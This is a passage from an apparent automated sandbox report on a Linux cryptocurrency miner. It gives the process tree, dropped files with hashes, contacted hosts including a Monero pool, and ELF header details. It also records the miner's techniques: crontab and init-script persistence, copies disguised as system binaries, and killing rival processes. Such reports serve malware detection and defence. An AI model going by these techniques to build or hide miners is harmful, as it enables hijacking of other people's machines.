          • tmpnam_KEKnmE New Fork (PID: 5818, Parent: 5465)
            • chmod (PID: 5827, Parent: 5818, MD5: 7c556d30bb69995e4844f5e319e8c303)
          • tmpnam_KEKnmE New Fork (PID: 5837, Parent: 5465)
            • cp (PID: 5845, Parent: 5837, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
            • touch (PID: 5854, Parent: 5837, MD5: 985a951b1a7a8dbe51973e651a365900)
          • tmpnam_KEKnmE New Fork (PID: 5862, Parent: 5465)
            • which (PID: 5870, Parent: 5862, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5877, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5884, Parent: 5465)
            • which (PID: 5891, Parent: 5884, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • which (PID: 5898, Parent: 5465, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
          • tmpnam_KEKnmE New Fork (PID: 5909, Parent: 5465)
            • chattr (PID: 5918, Parent: 5909, MD5: 429aabf876ae1d2fa2459219366d273c)
        • sh New Fork (PID: 5925, Parent: 5461)
        • rm (PID: 5925, Parent: 5461, MD5: a53cece4b9a67959e2143873e47a9cc5)
    • sh (PID: 5455, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5458, Parent: 5455)
      • cp (PID: 5458, Parent: 5455, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
      • sh New Fork (PID: 5471, Parent: 5455)
      • ln (PID: 5471, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5481, Parent: 5455)
      • ln (PID: 5481, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5490, Parent: 5455)
      • ln (PID: 5490, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5498, Parent: 5455)
      • ln (PID: 5498, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5507, Parent: 5455)
      • ln (PID: 5507, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5520, Parent: 5455)
      • ln (PID: 5520, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5529, Parent: 5455)
      • ln (PID: 5529, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5538, Parent: 5455)
      • ln (PID: 5538, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5546, Parent: 5455)
      • ln (PID: 5546, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5556, Parent: 5455)
      • ln (PID: 5556, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5565, Parent: 5455)
      • ln (PID: 5565, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5573, Parent: 5455)
      • ln (PID: 5573, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5581, Parent: 5455)
      • ln (PID: 5581, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5590, Parent: 5455)
      • ln (PID: 5590, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5599, Parent: 5455)
      • ln (PID: 5599, Parent: 5455, MD5: 1b38975800862fdf2d2c8165ed30690b)
      • sh New Fork (PID: 5609, Parent: 5455)
      • touch (PID: 5609, Parent: 5455, MD5: 985a951b1a7a8dbe51973e651a365900)
    • sh (PID: 5618, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
    • cat (PID: 5618, Parent: 5451, MD5: 1484a27859e2ca20ad667cc06d595d22)
    • sh (PID: 5632, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
    • sh (PID: 5640, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5651, Parent: 5640)
      • sysctl (PID: 5651, Parent: 5640, MD5: 9df6c33985f7fcbf67238428900a5a8d)
    • sh (PID: 5667, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5676, Parent: 5667)
      • sysctl (PID: 5676, Parent: 5667, MD5: 9df6c33985f7fcbf67238428900a5a8d)
    • sh (PID: 5694, Parent: 5451, MD5: df0d31d6acbb7862916223a26cc45da0)
      • sh New Fork (PID: 5702, Parent: 5694)
        • sh New Fork (PID: 5711, Parent: 5702)
        • touch (PID: 5711, Parent: 5702, MD5: 985a951b1a7a8dbe51973e651a365900)
        • sh New Fork (PID: 5724, Parent: 5702)
        • chmod (PID: 5724, Parent: 5702, MD5: 7c556d30bb69995e4844f5e319e8c303)
    • coinminer New Fork (PID: 5731, Parent: 5451)
      • sh (PID: 6121, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 6122, Parent: 6121)
        • ps (PID: 6122, Parent: 6121, MD5: 8f71c85b9cc1809af7e7612c6144c527)
        • sh New Fork (PID: 6123, Parent: 6121)
        • grep (PID: 6123, Parent: 6121, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
        • sh New Fork (PID: 6124, Parent: 6121)
        • awk (PID: 6124, Parent: 6121, MD5: 36e491b1e47944fb397b84f790ef5093)
        • sh New Fork (PID: 6125, Parent: 6121)
        • xargs (PID: 6125, Parent: 6121, MD5: 2098c131c6f1f63777e9678b4be4e752)
          • xargs New Fork (PID: 6129, Parent: 6125)
          • kill (PID: 6129, Parent: 6125, MD5: 39b42e1d9f0e1f508f3d256386551133)
      • sh (PID: 6218, Parent: 5731, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 6219, Parent: 6218)
        • ps (PID: 6219, Parent: 6218, MD5: 8f71c85b9cc1809af7e7612c6144c527)
        • sh New Fork (PID: 6220, Parent: 6218)
        • grep (PID: 6220, Parent: 6218, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
        • sh New Fork (PID: 6221, Parent: 6218)
        • awk (PID: 6221, Parent: 6218, MD5: 36e491b1e47944fb397b84f790ef5093)
        • sh New Fork (PID: 6222, Parent: 6218)
        • xargs (PID: 6222, Parent: 6218, MD5: 2098c131c6f1f63777e9678b4be4e752)
          • xargs New Fork (PID: 6224, Parent: 6222)
          • kill (PID: 6224, Parent: 6222, MD5: 39b42e1d9f0e1f508f3d256386551133)
  • cleanup

Created / dropped Files

/etc/crontab
Process:/bin/sh
File Type:ASCII text
Size (bytes):29
Entropy (8bit):3.7454064259382482
Encrypted:false
MD5:5FD705938F9AC092F364F71EA2BD0E6F
SHA1:F509AA606288B3971D2EB26A34CA1B5E367BDA83
SHA-256:EC76426A62B45CC455F05FBCCE1C35DCDD4A6C51B07F912BDF975483C5C5592D
SHA-512:12BF7782F11E8FB9F22558D5B0E406F1671DF5C61316CBABFAB24038450224D73F0037907A75265008EADF0EB159FB86A3A37497CACB41058A7B8A67FB16DF86
Malicious:true
Reputation:low
/etc/rc.d/init.d/acpidtd
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:true
Reputation:low
/etc/resolv.conf
Process:/tmp/coinminer
File Type:ASCII text
Size (bytes):53
Entropy (8bit):3.752995276014951
Encrypted:false
MD5:3615D12B4DE9B6DFB843FAA13BA27EE3
SHA1:097CB5451232E8249E7EB5425A9F1389290ECF0D
SHA-256:63B88F240DBC259B3F4CEF56B8B65E5826284D9239660CB2858A7426831B4779
SHA-512:8589AE151FC60CAD1FB187611BC81BF7A903B6647A491C0BFD5A54C394162231165D145C4D4833563FC3440ED7D95F57D9A230057ADCE4EF8BF0F7917A422026
Malicious:false
Reputation:low
/proc/sys/vm/nr_hugepages
Process:/sbin/sysctl
File Type:ASCII text
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
MD5:650A1C9C9BAA20730B4FCFDBE4CDC135
SHA1:3E3B509DB98E4D590F900354BA6D0D7FCA39FF2D
SHA-256:56292515F7D3A7110811EB8DE26B3F75F82A0766AA5A1FD66EBCFCB84FE6D5FF
SHA-512:45DA0A164742A0A7294B68A1A0FB1868B4DEA8E1D2B5519FAADBC768CDA1AF44246EAF3032B7629D4EB106D5524611637BA49202F6790438CD351CAED489A21E
Malicious:false
Reputation:low
/tmp/tmplog
Process:/tmp/coinminer
File Type:ASCII text
Size (bytes):136
Entropy (8bit):4.646588511354186
Encrypted:false
MD5:A1ED9B1A92D85563B426DC5C369C81DF
SHA1:B2339DFA93BC2991E1DE7245D68A10AE8CBB6507
SHA-256:DB90E116874B411C2DE00E2B703EFD02E7CFDAF309745551B440CAEEBCDD2083
SHA-512:1839FFF5953AD74155AA9C4214279EFF8B8B6AB31D33E41A0EED6AF9BCB568AAE14DA77E11F9A95E76A22314DAA58471A1BB0345CF8E926DE6B69C4DBB28CA82
Malicious:false
Reputation:low
/tmp/tmpnam_KEKnmE
Process:/tmp/coinminer
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:true
Reputation:low
/usr/bin/ddus-uidgen
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:false
Reputation:low
/usr/bin/scnetstat
Process:/tmp/tmpnam_KEKnmE
File Type:data
Size (bytes):123675
Entropy (8bit):5.876757520501345
Encrypted:false
MD5:D03327A4CE834705219DFD33F391486B
SHA1:E5635CB6D40541B6E67C7D11EC3D19F67BDC3CD0
SHA-256:427EE62CC86673A3ABB1406CA80B1BE41EECDF795B0C2206793923AE68C9A3A6
SHA-512:938A5A24C6451939D5272523518FFEE8C510B49A7EC4573450D1B02C088335363DA6C3D65376F8404B8214047A4F3F39476B3370374DC45466C61E7BA5B5EE35
Malicious:false
Reputation:low
/usr/bin/wipefs
Process:/bin/cp
File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Size (bytes):2384177
Entropy (8bit):7.385631032142223
Encrypted:false
MD5:9A0629BBB97EF2C2FD8369778AA9A0D3
SHA1:AC522A00B0B668FEDCABB26D9F8A3F730A34DAFB
SHA-256:D47D2AA3C640E1563BA294A140AB3CCD22F987D5C5794C223CA8557B68C25E0D
SHA-512:175B0E11A995E545E2D7B351C67DE56F8B1BA4667811BE665DB2CBA4C27D4FD643F581564F07D413FCED4F497186DE94CA3E1BC68C9CB5D39FCF498140E19ABB
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
Reputation:low
/usr/sbin/scss
Process:/tmp/tmpnam_KEKnmE
File Type:data
Size (bytes):123675
Entropy (8bit):5.934501190892608
Encrypted:false
MD5:CA5B7947D2A598F71E675EE80FC28280
SHA1:44F3D6EC178920DC26B0BDF35FD5F5F3712B3463
SHA-256:04E38230DAE3FF2444A14C01535FD31CC13488B7DD4E42386D8CA7F86E542D14
SHA-512:5960ADE39D187594184965F3DC831E22E89E70E15A64977D848F1377F1CE7702E7B0C82EFA54760DD1F890EF8979D17DE0B4AA3B94FE92C307A789F224194393
Malicious:false
Reputation:low
/usr/sbin/ss
Process:/bin/cp
File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Size (bytes):1223753
Entropy (8bit):7.078975512411001
Encrypted:false
MD5:EAFEF5B086D1E5940AB27A617E48B7C4
SHA1:2E3549A3E2BD2E432AAA284AE66ED7F4A8011C27
SHA-256:723607BE9893F40FE241A1401342A8E12A56EB2B70E31E63E2047DC081E17E44
SHA-512:158FB6CBD0CCA82B3FF16CD5AD7F02CF8B274AE2A4F167D7A99C5A81F3D1A774DD7EDC1D61F509DB2E4676C672D91CE955DAD2F4F19817D7762B7F1CDE054905
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

Name:pool.minexmr.com
IP:37.59.43.131
Active:true
Malicious:false
Antivirus Detection:
Reputation:high

Contacted IPs

Public

IP:37.59.43.131
Country:France
ASN:16276
ASN Name:OVHFR
Malicious:false

IP:163.17.30.212
Country:Taiwan; Republic of China (ROC)
ASN:1659
ASN Name:ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC
Malicious:true

Static File Info

General

File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):7.385631032142223
TrID:
  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:coinminer
File size:2384177
MD5:9a0629bbb97ef2c2fd8369778aa9a0d3
SHA1:ac522a00b0b668fedcabb26d9f8a3f730a34dafb
SHA256:d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
SHA512:175b0e11a995e545e2d7b351c67de56f8b1ba4667811be665db2cba4c27d4fd643f581564f07d413fced4f497186de94ca3e1bc68c9cb5d39fcf498140e19abb
File Content Preview:.ELF..............>.......@.....@........\$.........@.8...@.......................@.......@.....<.#.....<.#....... ...............#......................y................ ...............#.............................................Q.td...................

Static ELF Info

ELF header

Class:ELF64
Data:2's complement, little endian
Version:1 (current)
Machine:Advanced Micro Devices X86-64
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x4015ff
Flags:0x0
ELF Header Size:64
Program Header Offset:64
Program Header Size:56
Number of Program Headers:5
Section Header Offset:2383024
Section Header Size:64